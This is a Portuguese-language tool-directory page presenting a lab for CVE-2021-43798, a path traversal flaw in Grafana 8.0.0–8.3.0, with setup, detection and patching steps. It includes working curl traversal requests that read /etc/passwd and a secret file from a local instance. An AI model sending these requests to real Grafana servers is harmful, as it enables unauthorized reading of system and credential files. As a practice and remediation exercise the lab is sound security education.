Skip to content
KitploitKITPLOIT
FerramentasBlog
Enviar
FerramentasBlog
Enviar

Ferramentas de Hacking, PenTest e Cibersegurança para o seu Arsenal de Segurança!

Kitploit é um diretório de ferramentas de hacking, cibersegurança e pentesting. Descubra as últimas atualizações de projetos para encontrar vulnerabilidades, analisar sistemas, automatizar testes e fortalecer sua segurança.

··Feeds·Contato·Privacidade·© 2026 Kitploit

Diretório de Ferramentas

Categorias

Ver todas as categorias
Loading categories
Ferramentas/GitHubGitHub/shivamg2004/-ine_shivam_gupta_23104003
Segurança de ContêineresAnálise de VulnerabilidadesExploraçãoExploração de Aplicações WebSegurança WebTestes de PenetraçãoAprendizado e EducaçãoLabs e Prática

Mais Populares

Ver todos →

Descubra as ferramentas mais usadas pela nossa comunidade.

Explore todas as ferramentas

Navegue pela nossa coleção de ferramentas

Ver todas as ferramentas →
Compartilhar
GitHub
shivamg2004/-ine_shivam_gupta_23104003

-INE_Shivam_Gupta_23104003

CVE-2021-43798 Grafana Path Traversal Não Autenticado - Laboratório de Segurança | Shivam Gupta | 23104003

Ver Repositório
há 6h 51mAinda não revisado

CVE-2021-43798 — Laboratório de Path Traversal Não Autenticado no Grafana

Apenas para uso educacional. Execute este laboratório somente em uma máquina local isolada. Nunca o exponha à internet.


Resumo da CVE

CampoDetalhe
ID da CVECVE-2021-43798
ProdutoGrafana
Versões Afetadas8.0.0 – 8.3.0
Versão Corrigida8.3.1+
SeveridadeAlta
Pontuação CVSS v3.17.5
CWECWE-22 — Path Traversal
Autenticação NecessáriaNenhuma
Vetor de AtaqueRede

Pré-requisitos

  • Docker Desktop (em execução)
  • Git
  • curl

Configuração

root@kitploit:~
git clone https://github.com/YOUR_USERNAME/INE_Shivam_Gupta.git
cd INE_Shivam_Gupta

Iniciar o Ambiente Vulnerável

root@kitploit:~
docker compose up -d

Verifique:

root@kitploit:~
curl http://127.0.0.1:3000/api/health
# Esperado: "version": "8.3.0"

Abra http://127.0.0.1:3000 — login: admin / admin


Explorar a Vulnerabilidade

root@kitploit:~
curl.exe --path-as-is "http://127.0.0.1:3000/public/plugins/alertlist/../../../../../../../../../etc/passwd"
curl.exe --path-as-is "http://127.0.0.1:3000/public/plugins/alertlist/../../../../../../../../../etc/lab_secret.txt"

Esperado: conteúdo do arquivo retornado com HTTP 200 — nenhuma autenticação necessária.


Detecção

root@kitploit:~
curl.exe --path-as-is "http://127.0.0.1:3000/public/plugins/alertlist/../../../../../../../../../etc/hostname"
curl.exe http://127.0.0.1:3000/api/health

Se o hostname for retornado → VULNERÁVEL. Versão 8.0.0–8.3.0 → VULNERÁVEL.


Remediação

Inicie a instância corrigida (Grafana 8.3.1):

root@kitploit:~
docker compose -f docker-compose.patched.yml up -d

Verifique se o exploit está bloqueado:

root@kitploit:~
curl.exe --path-as-is "http://127.0.0.1:3001/public/plugins/alertlist/../../../../../../../../../etc/passwd"
# Esperado: {"message": "Plugin file not found"}

Parar o Laboratório

root@kitploit:~
docker compose down
docker compose -f docker-compose.patched.yml down

Referências

  • https://nvd.nist.gov/vuln/detail/CVE-2021-43798
  • https://grafana.com/blog/2021/12/07/grafana-8.3.1-and-7.5.12-released-with-moderate-severity-security-fix/
  • https://cwe.mitre.org/data/definitions/22.html
Baixar ferramenta